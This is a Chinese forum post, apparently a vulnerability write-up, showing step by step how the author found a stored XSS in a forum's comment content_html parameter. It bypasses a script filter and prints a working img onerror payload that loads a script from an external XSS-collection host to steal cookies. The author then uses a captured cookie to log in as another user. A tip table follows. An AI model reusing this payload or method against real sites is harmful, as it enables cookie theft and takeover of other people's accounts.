论坛xss利用打到cookie
1.首先在评论区随表输入内容,发表然后抓包。
发现content_html参数
解码看了一下是
直接发表看一下源代码。
这里能大胆猜一下,这里的传参可能是我们最后发表的内容。
把传参的content_html该成<h1>44444</h1>的编码试试
猜想没有错,最后直接变成内容了
试试srcipt会不会被过滤
很明显被过滤了。
当然要获取cookie不是只有srcipt才行。试试img喃
可以看到并没有被过滤
编辑节点看一下大于号和小于号有没有被编码
并没有编码,但是加了一个属性。百度了一下。
没有很明白,大概意思就是不发送消息,我是这样理解的。看能不能把这个属性过滤掉。
这里我想了很多办法试了很多还是没有过滤掉。
最后我发现的突破口是这样的,没有带<>的srcipt是不会被过滤的。
于是我想到了用img的onerror属性去创建一个srcipt,然后把创建出来的srcipt加到body子节点。然在去发送src
最后的xss为: <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xss.pt/vsTA';>
然后发表评论试试。
看一下xss平台有没有打到cookie
成功打到了cookie,但是不知道是不是只能打自己的。换一下账号测试一下。
换了一个账号查看评论
上xss看一下,成功打到了。
赶紧退出去,用cookie试一下能不能上号。
利用cookie成功上号
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| kbxiaohao | 1.83 | 0 | 2021-07-25 03:03:10 | 一个受益终生的帖子~~ |
| kbxiaohao | 1.00 | 0 | 2021-07-25 03:03:09 | 一个受益终生的帖子~~ |
| kbxiaohao | 1.00 | 0 | 2021-07-25 03:03:00 | 一个受益终生的帖子~~ |
| kbxiaohao | 0.01 | 0 | 2021-07-25 03:03:39 | 一个受益终生的帖子~~ |
| kbxiaohao | 0.01 | 0 | 2021-07-25 03:03:42 | 一个受益终生的帖子~~ |
| kbxiaohao | 1.00 | 0 | 2021-07-25 03:03:58 | 一个受益终生的帖子~~ |
| kbxiaohao | 0.01 | 0 | 2021-07-25 03:03:34 | 一个受益终生的帖子~~ |
| kbxiaohao | 0.01 | 0 | 2021-07-25 03:03:07 | 一个受益终生的帖子~~ |
| kbxiaohao | 0.01 | 0 | 2021-07-25 03:03:45 | 一个受益终生的帖子~~ |
| kbxiaohao | 0.01 | 0 | 2021-07-25 03:03:40 | 一个受益终生的帖子~~ |
| kbxiaohao | 0.01 | 0 | 2021-07-25 03:03:57 | 一个受益终生的帖子~~ |
| 空白丶 | 0.10 | 0 | 2021-07-25 03:03:48 | 一个受益终生的帖子~~ |
| 奖励系统 | 100.00 | 0 | 2021-07-02 15:03:59 | 投稿满 10 赞奖励 |
| 奖励系统 | 50.00 | 0 | 2021-06-27 12:12:20 | 投稿满 5 赞奖励 |
| 1399546819 | 5.00 | 0 | 2021-06-27 12:12:58 | 一个受益终生的帖子~~ |
| 伐谋 | 5.00 | 0 | 2021-06-27 02:02:23 | 一个受益终生的帖子~~ |
| 念旧 | 1.00 | 0 | 2021-06-26 20:08:46 | 一个受益终生的帖子~~ |
| 清河逸尘 | 1.00 | 0 | 2021-06-26 20:08:56 | 膜拜+1 |
| 念旧 | 5.00 | 0 | 2021-06-26 20:08:55 | 一个受益终生的帖子~~ |
| Track-聂风 | 2888.00 | 0 | 2021-06-26 18:06:11 | 学院漏洞,特殊奖励 |
打赏我,让我更有动力~
21 条回复
|
直到 2021-9-10 |
5043 次浏览
登录后才可发表内容
返回:技术文章投稿区
漏洞文章
